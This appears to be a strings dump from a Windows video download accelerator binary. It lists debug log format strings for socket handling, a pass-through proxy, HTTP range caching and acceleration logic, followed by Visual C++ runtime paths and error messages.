[AsyncSocket::IsConnected] ___Warning Socket %d - not connected or invalid.
[AsyncSocket::IsConnected] ___Warning Socket %d - not connected. ret: %d, LE: %d
[AsyncSocket::Read] socket %d, Read: %d, Total: %lld
[AsyncSocket::Read] ___Warning - socket %d can't read from yet.
[AsyncSocket::Read] ___Error reading from socket %d. LE: %d
[AsyncSocket::Read] ___Warning - socket %d is not ready to read from.
[AsyncSocket::Write] socket %d, Written: %u, Total: %lld.
[AsyncSocket::Write] socket %d, Written: %u, Total: %lld. (BytesWrittenSinceLastSecond: %d)
[AsyncSocket::Write] ___Error - socket %d. LE: %d.
[AsyncSocket::Write] ___Warning - socket %d is not ready for writing. LE: WSAEWOULDBLOCK.
[AsyncSocket::Write] ___Warning - socket %d. LE: WSAENOBUFS, reducing buffer size...
[AsyncSocket::Write] ___Error - socket %d failed writing for %d seconds !!!
[AsyncSocket::Write] ___Warning - socket %d is not ready for writing (wait for FD_WRITE event).
[AsyncSocket::Write] ___Error - socket %d invalid.
[AsyncSocket::SetSockName] socket %d, IP: %s, Port: %u
%u.%u.%u.%u
[AsyncSocket::SetPeerName] socket %d, IP: %s, Port: %u
[AsyncSocket::SetMaximumBPSToWrite] socket %d - Max Bps: %d
[AsyncSocket::EnumNetworkEvents] socket %d - Events: %X, Signaled: %X
[AsyncSocket::Ioctl] socket %d, cmd: %d, argp: %p, pOverlapped: %p
[AsyncSocket::GetOverlappedResult] socket %d
[AsyncSocket] socket %d
[AsyncSocket::Initialize] socket %d was initialized.
[AsyncSocket::Initialize] ___Error registering on the network events for socket %d.
[AsyncSocket::Initialize] socket %d - changed SO_SNDBUF: %d
[AsyncSocket::Initialize] socket %d - SO_SNDBUF: %d
[AsyncSocket::UnInitialize] socket %d
[AsyncSocket::Close] socket %d, do nothing
[AsyncSocket::Close] socket %d ___Error RemoveIgnoredConnection
[AsyncSocket::Close] socket %d
[~AsyncSocket] socket %d
[AsyncSocket::Bind] ___Error binding socket %d to port: %u. LE: %d
[AsyncSocket::Bind] new socket %d - %s : %d
[AsyncSocket::Bind] socket %d - %s : %d
[AsyncSocket::Connect] socket %d - connected !
[AsyncSocket::Connect] ___Warning socket %d - Async connecting... LE: %d
[AsyncSocket::Connect] ___Error socket %d, LE: %d
[AsyncSocket::Connect] socket %d - Already connected !
[AsyncSocket::Connect] ___Error socket %d - Already connected to another IP: %s, Port: %u
[AsyncSocket::Connect] socket %d - IP: %s, Port: %u
[CProxyServerPassThrough::SocketReadyToWriteInto] FDM=%d (%d)
[CProxyServerPassThrough::SocketWasConnected] FDM=%d (%d)
[CProxyServerPassThrough::SocketWasClosed] FDM=%d (%d) - SocketReadyToReadFrom
[CProxyServerPassThrough::SocketWasClosed] FDM=%d (%d)
[CProxyServerPassThrough::ErrorOnSocket] FDM=%d (%d)
[CProxyServerPassThrough] FDM=%d
[CProxyServerPassThrough::DisableRedirectionOnConnection] FDM=%d (%d) ___Error adding port %d to ignore list
[CProxyServerPassThrough::DisableRedirectionOnConnection] FDM=%d (%d) socket %d - going to add port %d to ignore list
[CProxyServerPassThrough::DisableRedirectionOnConnection] FDM=%d (%d) ___Error invalid IRedirectController
[CProxyServerPassThrough::DisableRedirectionOnConnection] FDM=%d (%d) ___Error GetSockName, LE: %d
[CProxyServerPassThrough::DisableRedirectionOnConnection] FDM=%d (%d) ___Error binding socket %d, LE: %d
[CProxyServerPassThrough::DisableRedirectionOnConnection] FDM=%d (%d) ___Error invalid socket
[CProxyServerPassThrough::SocketReadyToReadFrom] FDM=%d (%d) - After writing %d bytes into upper level
[CProxyServerPassThrough::SocketReadyToReadFrom] FDM=%d (%d) - Going to write the %d bytes into the upper level
[CProxyServerPassThrough::SocketReadyToReadFrom] FDM=%d (%d) - Read %d bytes from socket %d
[CProxyServerPassThrough::SocketReadyToReadFrom] FDM=%d (%d) ___Error Reading from socket %d
[CProxyServerPassThrough::SocketReadyToReadFrom] FDM=%d (%d) - Reading from socket %d
[CProxyServerPassThrough::SocketReadyToReadFrom] FDM=%d (%d) ___Error invalid socket
[CProxyServerPassThrough::ConnectToServer] FDM=%d (%d) ___Error connecting, LE: %d
[CProxyServerPassThrough::ConnectToServer] FDM=%d (%d) - Connected to %s : %d
[CProxyServerPassThrough::ConnectToServer] FDM=%d (%d) - Connecting to %s : %d
[HttpProxyServer::ConnectToServer] FDM=%d (%d) ___Error invalid socket
[CProxyServerPassThrough::GetDestinationIpAndPort] FDM=%d (%d) ___Error getting the destination details. Local: %s:%d
[CProxyServerPassThrough::GetDestinationIpAndPort] FDM=%d (%d) - Local: %s:%d, Remote: %s:%d, PID: %d
[CProxyServerPassThrough::GetDestinationIpAndPort] FDM=%d (%d) ___Error invalid IRedirectController
[CProxyServerPassThrough::IsPassThrough] FDM=%d (%d) ___Error GetDestinationIpAndPort
[CProxyServerPassThrough::IsPassThrough] FDM=%d (%d) ___Error getting the connected IP and Port
[CProxyServerPassThrough::AcceptConnection] FDM=%d (%d) ___Error ConnectToServer
[CProxyServerPassThrough::AcceptConnection] FDM=%d (%d) ___Error to initialize Worker: %d.
[CProxyServerPassThrough::AcceptConnection] FDM=%d (%d) - Going to initialize Worker: %d.
[CProxyServerPassThrough::AcceptConnection] FDM=%d (%d) ___Error not enough memory to allocate ProxyPeer.
[SubjectDataProperty::Serialize] ___Error not supported yet
[SubjectDataProperty::Deserialize] ___Error not supported yet
m_PropertyValue.pszValue
m_PropertyValue.pValue
[SubjectDataProperty::GetValue(int)] ___WARNING: m_PropertyType is: %d
[SubjectDataProperty::GetValue(UINT)] ___WARNING: m_PropertyType is: %d
[SubjectDataProperty::GetValue(DWORD)] ___WARNING: m_PropertyType is: %d
[SubjectDataProperty::GetValue(char*)] ___Error: The buffer is too small (Internal Buffer Size: %d, Internal Buffer Size %d)
[SubjectDataProperty::GetValue(BYTE*)] ___Error: The buffer is too small (Internal Buffer Size: %d, Internal Buffer Size %d)
[CacheManager::GetCacheWriter] FDM=%d, Dummy - CacheWriter: %p
[CacheManager::GetCacheWriter] FDM=%d, Real - CacheWriter: %p
[CacheManager::Pause] FDM=%d
[CacheManager::Resume] FDM=%d
[CacheManager::SetCacheData] FDM=%d - CD:%d (pICacheData: %p)
[CacheManager::SetFileDownloadMgr] FDM=%d - pIFileDownloadMgr: %p, DownloadSize: %lld
[CacheManager::IsWritingComplete] FDM=%d *** Writing Completed *** (%lld >= %lld)
[CacheManager::StopCacheData] FDM=%d - CacheData has incomplete HTTP header - going to destroy it...
[CacheManager::StopCacheData] FDM=%d
[CacheManager::Stop] FDM=%d
[CacheManager::FindWorkerByRange] FDM=%d - Cache Worker Found!
[CacheManager::FindWorkerByRange] FDM=%d ... Cache Worker range: %lld-%lld
[CacheManager::FindWorkerByRange] FDM=%d ___Error pJobInfo invalid
[CacheManager::FindWorkerByRange] FDM=%d ___Error pICacheWorker invalid
[CacheManager::FindWorkerByRange] FDM=%d ___Error Cache Workers list is empty
[CacheManager::FindWorkerByRange] FDM=%d - Find Chache Worker of range: %lld-%lld
[CacheManager::WriteAvailableBuffer] FDM=%d *** Reached end of Workers list ***
[CacheManager::WriteAvailableBuffer] FDM=%d, CacheWorker: %p - Not finished yet. (status:%d)
[CacheManager::WriteAvailableBuffer] FDM=%d, CacheWorker: %p ___Warning Failed to write from cache. (status:%d)
[CacheManager::WriteAvailableBuffer] FDM=%d, CacheWorker: %p - WORKER_STATUS_ERROR
[CacheManager::WriteAvailableBuffer] FDM=%d, CacheWorker: %p - *** Set Active ***
[CacheManager::WriteAvailableBuffer] FDM=%d, CacheWorker: %p - *** Cache Worker Finished ***
[CacheManager::WriteAvailableBuffer] FDM=%d *** Cache Manager Finished ***
[CacheManager::WriteAvailableBuffer] FDM=%d *** Workers list is empty ***
[CacheManager::WriteAvailableBuffer] FDM=%d - Not Working ! (State: %d)
[CacheManager::WriteAvailableBuffer] FDM=%d - State: %d
[CacheManager::RemoveAllWorkers] FDM=%d
[~CacheManager - %p] FDM=%d
[CacheManager::Reset] FDM=%d
[CacheManager::CreateWorker] FDM=%d - Already has an Active CacheWorker: %p
[CacheManager::CreateWorker] FDM=%d - Set Active CacheWorker: %p
[CacheManager::CreateWorker] FDM=%d - Created CacheWorker: %p, Active is: %p
[JobsManager::MergeFailedJobs] Job:%d  = Job:%d
[JobsManager::CreateJob] Job:%d, %lld-%lld
[JobsManager::CreateJob] ___Warning Job:%d, %lld-%lld, already exist
[JobsManager::CreateTimeJob] Job:%d, %lld-0
[JobsManager::DestroyJob] Job:%d
[AccelerationLogicHD::GetInitialRanges] FDM=%d *** Range Size: %lld (%d)
[AccelerationLogicHD::GetInitialRanges] FDM=%d *** Time Range Size: %lld (%d)
[AccelerationLogicHD::GetInitialRanges] FDM=%d ___Error - Unknown algorithm
[AccelerationLogicHD::GetInitialRanges] FDM=%d - Update InitialRangeSize: %lld (bytes)
[AccelerationLogicHD::GetInitialRanges] FDM=%d ___Warning - Master downloaded more then its range (%lld > %lld). Reducing number of connection to %d
[AccelerationLogicHD::GetInitialRanges] FDM=%d ___Error Time Acceleration: LastTimeEndPosition   InitialTimeRangeSize > StartTimePosition   TotalPlayDuration (%lld   %lld > %lld   %lld)
[AccelerationLogicHD::GetInitialRanges] FDM=%d ___Error LastEndPosition >= StartPosition   DownloadSize - 1 (%lld >= %lld)
[AccelerationLogicHD::GetInitialRanges] FDM=%d ___Error RangeIndex > NumberOfConnections (%d > %d)
[AccelerationLogicHD::GetInitialRanges] FDM=%d ___Warning AccelerationLogic == AL_NO_ACCELERATION
[AccelerationLogicHD::SetTimeStartPosition] FDM=%d - Start Time Position: %lld (%lld)
[AccelerationLogicHD::SetLastTimeEndPosition] FDM=%d - Last Time End Position: %lld (%lld)
[AccelerationLogicHD::IsToUseOriginalRequest] Res = %s.
[AccelerationLogicHD::IsPartner] Partner = %d
[AccelerationLogicHD::CalculateRangeSizeLimit] ___Warning SizeLimit %d RangeSize cut from %d to %d
[AccelerationLogicHD::CalculateRangeSizeLimit] FDM=%d - Size limit: %lld
[AccelerationLogicHD::UpdateToRegistryValues] BufferingTime: %d
[AccelerationLogicHD::UpdateToRegistryValues] DelayTime: %d
[AccelerationLogicHD::CalculateNextRangeSize] FDM=%d - n64MinimumRangeSize: %lld
[AccelerationLogicHD::CalculateNextRangeSize] FDM=%d - NextRangeSize was reduced to the maximum range size: %lld
[AccelerationLogicHD::CalculateNextRangeSize] FDM=%d - LastMaxRangeSize was increased to: %lld
[AccelerationLogicHD::CalculateNextRangeSize] FDM=%d - MaxRangeSizePerConnection: %lld
[AccelerationLogicHD::CalculateNextRangeSize] FDM=%d - Did not finish downloading the pre-buffering: %lld
[AccelerationLogicHD::CalculateNextRangeSize] FDM=%d ___Warning *** Potential Buffering Predicted *** - Player has less then 2 seonds play time: %lld
[AccelerationLogicHD::CalculateNextRangeSize] FDM=%d ___Warning *** Potential Buffering Predicted *** - Played all written bytes: %lld
[AccelerationLogicHD::CalculateNextRangeSize] FDM=%d ___Warning *** Potential Buffering Predicted *** - Played all ranges
[AccelerationLogicHD::CalculateNextRangeSize] WorkerBps: %d
[AccelerationLogicHD::CalculateNextRangeSize] PlayRate: %d
[AccelerationLogicHD::CalculateNextRangeSize] 3G: %d
[AccelerationLogicHD::CalculateNextRangeSize] FDM=%d - NextRangeTimeSize was set to the maximum range time size %.1f
[AccelerationLogicHD::CalculateNextRangeSize] FDM=%d - LastMaxRangeTimeSize was increased to %lld
[AccelerationLogicHD::CalculateNextRangeSize] FDM=%d - n64MaxRangeTimeSizePerConnection %lld
[AccelerationLogicHD::GetMinTimeRangeSize] %d (sec)
[AccelerationLogicHD::GetInitialTimeRangeSize] %d (sec)
[AccelerationLogicHD::GetInitialRangeSize] %d (bytes)
[AccelerationLogicHD::IsPotentialBuffering] FDM=%d, Job:%d ___Warning *** Potential Buffering Predicted *** - In about: %.1f seconds
[AccelerationLogicHD::IsPotentialBuffering] FDM=%d, Job:%d ___Warning *** Potential Buffering Predicted *** - Player has less then 2 seconds play time: %lld bytes
[AccelerationLogicHD::IsPotentialBuffering] FDM=%d, Job:%d ___Warning *** Potential Buffering Predicted *** - Played all written bytes: %lld
[AccelerationLogicHD::IsPotentialBuffering] FDM=%d, Job:%d ___Warning *** Potential Buffering Predicted *** - PlayerPosition >= DownloadPosition (%lld >= %lld)
[AccelerationLogicHD::IsPotentialBuffering] FDM=%d, Job:%d ___Warning *** Download Potential Buffering Predicted *** - TimeLeftToDownload: %.1f
[AccelerationLogicHD::IsPotentialBuffering] FDM=%d, Job:%d - Wait for at least 10 seconds... (%lld)
[AccelerationLogicHD::IsPotentialBuffering] FDM=%d, Job:%d - Wait for at least 5 seconds... (%lld)
[AccelerationLogicHD::IsPotentialBuffering] FDM=%d, Job:%d - Wait until finish downloading the player initial cache...
[AccelerationLogicHD::IsPotentialBuffering] FDM=%d, Job:%d ___Warning invalid m_pRedirectDomainRule
[AccelerationLogicHD::IsPotentialBuffering] FDM=%d, Job:%d ___Warning Active job has completed
[AccelerationLogicHD::IsPotentialBuffering] FDM=%d, Job:%d ___Warning Time acceleration is not supported yet...
[AccelerationLogicHD::IsPotentialBuffering] FDM=%d, Job:%d ___Error invalid pJobInfo
[AccelerationLogicHD::GetNextRange] FDM=%d *** Next Range Size: %lld (%d), 3G: %d
[AccelerationLogicHD::GetNextRange] FDM=%d *** Next Time Range Size: %lld (%d), 3G: %d
[AccelerationLogicHD::GetNextRange] FDM=%d ___Error - Unknown algorithm
[AccelerationLogicHD::GetNextRange] FDM=%d ___Error LastTimeEndPosition   InitialTimeRangeSize (%lld   %lld) > StartTimePosition   TotalPlayDuration (%lld   %lld)
[AccelerationLogicHD::GetNextRange] FDM=%d ___Error LastEndPosition (%lld) >= StartPosition   DownloadSize - 1 (%lld   %lld)
[AccelerationLogicHD::AccelerateIsSupported] FDM=%d ___Warning - No rule for this domain
AccelerationLogicHD::AccelerateIsSupported
[AccelerationLogicHD::GetRedirectRuleName] FDM=%d - %s
[AccelerationLogicHD::IsToAccelerate] FDM=%d - Enable Acceleration - DownloadRate: %d, PlayTime: %d (Delay: %d)
[AccelerationLogicHD::IsToAccelerate] FDM=%d - Last End Position: %lld --> %lld (%lld)
[AccelerationLogicHD::IsToAccelerate] FDM=%d ___Warning - Range Acceleration not needed - All file was downloaded... (%lld >= %lld)
[AccelerationLogicHD::IsToAccelerate] FDM=%d - Last Time End Position: %lld --> %lld (%lld)
[AccelerationLogicHD::IsToAccelerate] FDM=%d ___Warning - Time Acceleration not needed - All file was downloaded... (%lld >= %lld)
[AccelerationLogicHD::IsToAccelerate] FDM=%d ___Warning - Network too slow for acceleration - wait for pre-buffer to complete... (%d < 7KBps)
[AccelerationLogicHD::FileShouldBeAccelerated] ___Warning - aktimeoffset not supported
[AccelerationLogicHD::ShouldAccelerate] FDM=%d ___Warning - Trail expired
[AccelerationLogicHD::ShouldAccelerate] FDM=%d ___Warning - No rule pointer for this domain
[AccelerationLogicHD::ShouldAccelerate] FDM=%d ___Warning - No rule for this domain
[AccelerationLogicHD::ShouldAccelerate] FDM=%d ___Warning - Server is known to not support ranges
[AccelerationLogicHD::ShouldAccelerate] FDM=%d ___Warning - not a GET command
[AccelerationLogicHD::ShouldAccelerate] FDM=%d ___Warning - Number of connection is set to one
[AccelerationLogicHD::UpdateAccelerationLogic] FDM=%d - Initial & Max TimeRangeSize: %lld (ms)
[AccelerationLogicHD::UpdateAccelerationLogic] FDM=%d - Initial & Max RangeSize: %lld (bytes)
[AccelerationLogicHD::UpdateAccelerationLogic] FDM=%d - MaxNumberOfConnections: %d
[AccelerationLogicHD::UpdateAccelerationLogic] FDM=%d - iTunes
[AccelerationLogicHD::UpdateAccelerationLogic] FDM=%d - QuickTimeWinInet
[AccelerationLogicHD::UpdateAccelerationLogic] FDM=%d ___Error - invalid m_pRedirectDomainRule
[AccelerationLogicHD::IsPartner] ___Error - get module filename: %d
[AccelerationLogicHD::Reset] FDM=%d
[AccelerationLogicHD::GetRequestRangeLocation] FDM=%d - Default Uri Offset Token: %s
[AccelerationLogicHD::GetRequestRangeLocation] FDM=%d - Default Time Token: %s
[AccelerationLogicHD::GetRequestRangeLocation] FDM=%d - Uri Range Token: %s
[AccelerationLogicHD::GetRequestRangeLocation] FDM=%d - Uri Offset Token: %s
[AccelerationLogicHD::GetRequestRangeLocation] FDM=%d - Time Token: %s
[AccelerationLogicHD::GetRequestRangeLocation] FDM=%d - Rule Location: %d
[AccelerationLogicHD::GetRequestRangeLocation] FDM=%d ___Error - invalid m_pRedirectDomainRule
[CConnectionsManager::OnStartAcceleration] Max: %d, Init: %d, AvgBps: %d
[CConnectionsManager::ResetStartAcceleration] AvgBps: %d
[CConnectionsManager::GetNumberOfConnections] Decreased to: %d, AvgBps: %d (%d)
[CConnectionsManager::GetNumberOfConnections] Increased to: %d, AvgBps: %d (%d)
[CConnectionsManagerSocket] socket %d
[CConnectionsManagerSocket::OnReadEvent] socket %d
[CConnectionsManagerSocket::OnWriteEvent] socket %d
[CConnectionsManagerSocket::OnCloseEvent] socket %d
[CConnectionsManagerSocket::OnAcceptEvent] socket %d
[CConnectionsManagerSocket::OnConnectEvent] socket %d
[~CConnectionsManagerSocket] socket %d
[CConnectionsManager::OnReadEvent] socket %d
[CConnectionsManager::OnWriteEvent] socket %d
[CConnectionsManager::OnConnectEvent] socket %d - Connect Time: %d ms
[CConnectionsManager::PrepareAccelerationConnections] Max: %d, Remote: %s:%d
[CConnectionsManager::AddConnection] socket %d - Remote: %s:%d
[CConnectionsManager::AddConnection] ___Warning socket %d - not connected
[CConnectionsManager::Work] Remote: %s:%d - Done.
[CConnectionsManager::Work] ___Error Connect socket %d
[CConnectionsManager::Work] ___Error AsyncSocket Initialize. LE: %x
[CConnectionsManager::Work] Add socket %d - Remote: %s:%d
[CConnectionsManager::Work] Remote: %s:%d
[CConnectionsManager::Cleanup] %d sockets left in map
[CConnectionsManager::Cleanup] Cleaning %d sockets from map
[CConnectionsManager::RemoveConnection] socket %d
[CConnectionsManager::GetConnection] *** Found socket %d - %s:%d (3G: %d)***
[CConnectionsManager::GetConnection] socket %d - Not matching - %s:%d
[CConnectionsManager::GetConnection] ___Warning socket %d - not ready for Writing or not Connected to %s:%d
[CConnectionsManager::GetConnection] ___Warning socket %d - not connected to %s:%d
[CConnectionsManager::GetConnection] ___Warning socket %d - GetPeerName
[CConnectionsManager::GetConnection] ___Warning socket %d - GetInternalFlag(SOCKET_IS_CELLULAR) - %d
[CConnectionsManager::GetConnection] Remote: %s:%d, 3G: %d
[CConnectionsManager::OnCloseEvent] socket %d
lighttpd/1.4.8
[AccelerationLogic::SetPlayDuration] FDM=%d - Play Duration: %lld
[AccelerationLogic::SetDownloadSize] FDM=%d - Download size: %lld (%lld)
[AccelerationLogic::SetTotalFileSize] FDM=%d - Total File size: %lld
[AccelerationLogic::SetStartPosition] FDM=%d - Start Position: %lld (%lld)
[AccelerationLogic::SetLastEndPosition] FDM=%d - Last End Position: %lld (%lld)
[AccelerationLogic::SetNumberOfConnections] FDM=%d - Max Connections: %d
[AccelerationLogic::SetInitialNumberOfConnections] FDM=%d - Initial Connections: %d
[AccelerationLogic::SetMaximumRangeSize] FDM=%d - Max Range Size: %lld
[AccelerationLogic::SetMaximumBpsToWriteIntoSocket] FDM=%d - Max BPS: %d
[AccelerationLogic::SetRequestRangeLocation] Request Range Location: %d
[AccelerationLogic::UpdateBytesWritten] FDM=%d, Job:%d (3G: %d) - BytesWritten: %lld, TotalBytesWritten: %lld (%lld   %lld)
[AccelerationLogic::ReportOnStartPlay] FDM=%d, Job:%d (3G: %d)
[AccelerationLogic::ReportOnDownloadComplete] FDM=%d (3G: %d)
[AccelerationLogic::IsResponseRangeBiggerThenMaster] FDM=%d ___Warning - Range >= Master (%lld >= %lld)
[AccelerationLogic::IsToIncreaseWorkers] FDM=%d - Increased connections to: %d (%d)
[AccelerationLogic::SetPlayRate] FDM=%d - Play Rate: %d
[AccelerationLogic::UpdateBytesDownloaded] FDM=%d, Job:%d (3G: %d) - BytesDownloaded: %lld, TotalBytesDownloaded: %lld (%lld   %lld)
[AccelerationLogic::CalculateNextRangeSize] PlayTimeLeft %d
[AccelerationLogic::CalculateNextRangeSize] WorkerBps %d
[AccelerationLogic::CalculateNextRangeSize] nPlayTime %d
[AccelerationLogic::CalculateAverageWorkerBPS] FDM=%d - Total Average BPS: %d, Worker Average BPS: %d (%d/%d)
[AccelerationLogic::UpdateRedirectDomainRule] FDM=%d - Rule Domain Name: %s
[AccelerationLogic::UpdateRedirectDomainRule] FDM=%d ___Warning - Using generic rule
AppleWebKit
[AccelerationLogic::UpdateRedirectDomainRule] FDM=%d ___Warning - No Rule for Domain: %s
[AccelerationLogic::UpdateRedirectDomainRule] FDM=%d - Look for rule using - Host: %s, ContentType: %s
[AccelerationLogic::UpdateRedirectDomainRule] FDM=%d ___Error getting IAccelerationConfiguration
[AccelerationLogic::IsResponseRangeMatchRequestRange] FDM=%d *** Acceleration is not supported by the server ***. The field %s is not %s
[AccelerationLogic::IsResponseRangeMatchRequestRange] FDM=%d *** Acceleration is not supported by the server ***. The field %s was not found.
[AccelerationLogic::IsResponseRangeMatchRequestRange] FDM=%d ___Error GetRequestRangeLocation failed.
AccelerationLogic::AccelerateIsSupported
[AccelerationLogic::ReportOnRequestFinished] FDM=%d, Job:%d (3G: %d)
[AccelerationLogic::UpdateFileContentType] FDM=%d - ContentType: %s
[AccelerationLogic::UpdateRequestURI] FDM=%d - URI: %s
[AccelerationLogic::UpdateFileHost] FDM=%d - Host: %s
[AccelerationLogic::UpdateFileContentDisposition] FDM=%d - Content-Disposition: %s
[AccelerationLogic::UpdateUserAgent] FDM=%d - User-Agent: %s, Download: %d
NonSupportRangeServersList
[AccelerationLogic::IsResponseCodeValid] *** Acceleration is not supported by the server ***. The response code %s is not %s
[AccelerationLogic::CreateAnyRule] FDM=%d
[AccelerationLogic::FileShouldBeAccelerated] DailyMotion seek not supported
[AccelerationLogic::IsOurConnection] FDM=%d *** Acceleration is not allowed ***. Module: %s
[AccelerationLogic::Reset] FDM=%d
[~AccelerationLogic - %p] FDM=%d - ... Leave
[~AccelerationLogic - %p] FDM=%d - Enter ...
[AccelerationLogic::UpdateAverageBPS] FDM=%d, Job:%d (3G: %d) - %d
[CHttpCacheData::FreeBuffers] CD:%d, FDM=%d - Releasing %lld bytes
[CHttpCacheData::SetCacheLimit] CD:%d, FDM=%d - %lld --> %lld
[CHttpCacheData::Write - ICacheWriter] CD:%d, FDM=%d - Written: %d (%lld) bytes
[CHttpCacheData::SetOwnerCacheManager] CD:%d, FDM=%d - Cache is orphan & has incomplete http header
[CHttpCacheData::SetOwnerCacheManager] CD:%d, FDM=%d
[CHttpCacheData::GetRanges] CD:%d, FDM=%d - Ranges: %lld-%lld
[CHttpCacheData::SetActive] CD:%d, FDM=%d, Active: %d -> %d
[CHttpCacheData::SetComplete] CD:%d, FDM=%d, Complete: %d -> %d
[CHttpCacheData::IsMatch] CD:%d, FDM=%d - No Match! %lld-%lld (%lld-%lld), DataBytesInCache: %lld/%lld
[CHttpCacheData::IsMatch] CD:%d, FDM=%d - *** Match *** %lld-%lld (%lld-%lld), DataBytesInCache: %lld/%lld, HeaderBytesInCache: %d
[CHttpCacheData::IsMatch] CD:%d, FDM=%d - *** Match - Ignore ranges (Code: %d) *** %lld-%lld (%lld-%lld), DataBytesInCache: %lld/%lld, HeaderBytesInCache: %d
[CHttpCacheData::IsMatch] CD:%d, FDM=%d - Cookie No Match! (Code: %d) %lld-%lld (%lld-%lld), DataBytesInCache: %lld/%lld
[CHttpCacheData::Write] CD:%d, FDM=%d - Finish writing %d bytes
[CHttpCacheData::Write] CD:%d, FDM=%d - Appended %d (%lld/%lld) bytes
[CHttpCacheData::Write] CD:%d, FDM=%d - Writen %d bytes
[CHttpCacheData::Write] CD:%d, FDM=%d - Going to write new %d bytes - to CacheWorker: %p
[CHttpCacheData::Write] CD:%d, FDM=%d - Going to write cached %d bytes, from offset %lld - to CacheWorker: %p
[CHttpCacheData::Write] CD:%d, FDM=%d - GetTotalBytesWritten: %lld, BytesInBuffer: %lld, RANGE_START_POSITION: %lld, nDataBytesWritten: %lld
[CHttpCacheData::Write] CD:%d, FDM=%d - Appended %d bytes
[CHttpCacheData::Write] CD:%d, FDM=%d - Cache size: %d
[CHttpCacheData::Write] CD:%d, FDM=%d - Going to write %d bytes
[CHttpCacheData::AddCacheWorker] CD:%d, FDM=%d
[CHttpCacheData] CD:%d, Url: %s
[~CHttpCacheData] CD:%d
[CHttpCacheData::RemoveCacheWorker] CD:%d, FDM=%d - Try to stop the owner caching FDM...
[CHttpCacheData::RemoveCacheWorker] CD:%d, FDM=%d
[CHttpCacheData::DumpBufferToLogFile] CD:%d, FDM=%d
[CHttpCacheData::FlushDataToCacheWorker] CD:%d, FDM=%d - Written %d bytes (DATA)
[CHttpCacheData::FlushDataToCacheWorker] CD:%d, FDM=%d - Going to write %d bytes, from offset %lld (DATA)
[CHttpCacheData::FlushDataToCacheWorker] CD:%d, FDM=%d - Written %d bytes (HEADER)
[CHttpCacheData::FlushDataToCacheWorker] CD:%d, FDM=%d - Going to write %d bytes (HEADER)
[CHttpCacheData::FlushDataToCacheWorker] CD:%d, FDM=%d - Range: %lld-%lld
[CacheWorker::SetSize - %p] Cache size: %d
[CacheWorker::SetStatus - %p] WORKER_STATUS_FINISHED (%d) - job:%d
[CacheWorker::SetEncryptionKey - %p] Key: %p
[CacheWorker::AppendToCache - %p] Appending: %d bytes, Total Appended: %d
[CacheWorker::AppendToCache - %p] Bytes in buffer: %d
[CacheWorker::WriteToCacheWriter - %p] BytesWritten: %d, TotalBytesWritten: %lld, HeaderBytesDownloaded: %lld, DataBytesDownloaded: %lld
[CacheWorker::WriteToCacheWriter - %p] CacheData - Written %d bytes
[CacheWorker::WriteToCacheWriter - %p] CacheData - Going to write %d bytes
[CacheWorker::Write - %p] *** Finished to download & write job:%d ***
[CacheWorker::Write - %p] Appending: %d bytes, Total Appended: %d
[CacheWorker::Write - %p] After writing %d bytes from job %d (Range: %lld - %lld) to peer %p.
[CacheWorker::Write - %p] Before writing %d bytes from job %d (Range: %lld - %lld) to peer %p.
[CacheWorker::Write - %p] ___Warning already finished job:%d
[CacheWorker::Write - %p] Bytes in buffer: %d
[CacheWorker::WriteBufferFromCache - %p] *** Finished to download & write job:%d ***
[CacheWorker::WriteBufferFromCache - %p] ___Error job %d (Range: %lld - %lld) failed to download for a lot of time.
[CacheWorker::WriteBufferFromCache - %p] After writing %d bytes from job %d (Range: %lld - %lld) to peer %p.
[CacheWorker::WriteBufferFromCache - %p] Going to write %d bytes from job %d (Range: %lld - %lld) to peer %p.
[CacheWorker::WriteBufferFromCache - %p] *** Worker Idle - Finished job:%d ***
[CacheWorker::WriteBufferFromCache - %p] ___Error job %d (Range: %lld - %lld) - Worker Idle - failed to download for a lot of time.
f:\dd\vctools\crt_bld\self_x86\crt\src\locale0.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\xmutex.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\locale.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\xlocale
f:\dd\vctools\crt_bld\self_x86\crt\src\xlocnum
f:\dd\vctools\crt_bld\self_x86\crt\src\_tolower.c
f:\dd\vctools\crt_bld\self_x86\crt\src\xmbtowc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wlocale.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\xloctime
f:\dd\vctools\crt_bld\self_x86\crt\src\locale
f:\dd\vctools\crt_bld\self_x86\crt\src\xlocmes
f:\dd\vctools\crt_bld\self_x86\crt\src\xlocmon
%d / %m / %y
%I : %M : %S %p
%m / %d / %y
%b %d %H : %M : %S %Y
f:\dd\vctools\crt_bld\self_x86\crt\src\xlocale.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\xwcsxfrm.c
f:\dd\vctools\crt_bld\self_x86\crt\src\onexit.c
Client hook allocation failure at file %hs line %d.
Memory allocated at %hs(%d).
Client hook re-allocation failure at file %hs line %d.
HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.
CRT detected that the application wrote to memory after end of heap buffer.
HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.
CRT detected that the application wrote to memory before start of heap buffer.
CRT detected that the application wrote to a heap buffer that was freed.
crt block at 0x%p, subtype %x, %Iu bytes long.
client block at 0x%p, subtype %x, %Iu bytes long.
%hs(%d) :
#File Error#(%d) :
Data: <%s> %s
f:\dd\vctools\crt_bld\self_x86\crt\src\initctyp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strerror.c
Visual C   CRT: Not enough memory to complete call to strerror.
f:\dd\vctools\crt_bld\self_x86\crt\src\setlocal.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strftime.c
f:\dd\vctools\crt_bld\self_x86\crt\src\inithelp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mlock.c
f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
_CrtDbgReport: String too long or IO Error
Debug %s!
Program: %s%s%s%s%s%s%s%s%s%s%s%s
f:\dd\vctools\crt_bld\self_x86\crt\src\mbctype.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tidtable.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_file.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_sftbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stream.c
f:\dd\vctools\crt_bld\self_x86\crt\src\read.c
%s(%d) : %s
_CrtDbgReport: String too long or Invalid characters in String
GetProcessWindowStation
f:\dd\vctools\crt_bld\self_x86\crt\src\stdenvp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stdargv.c
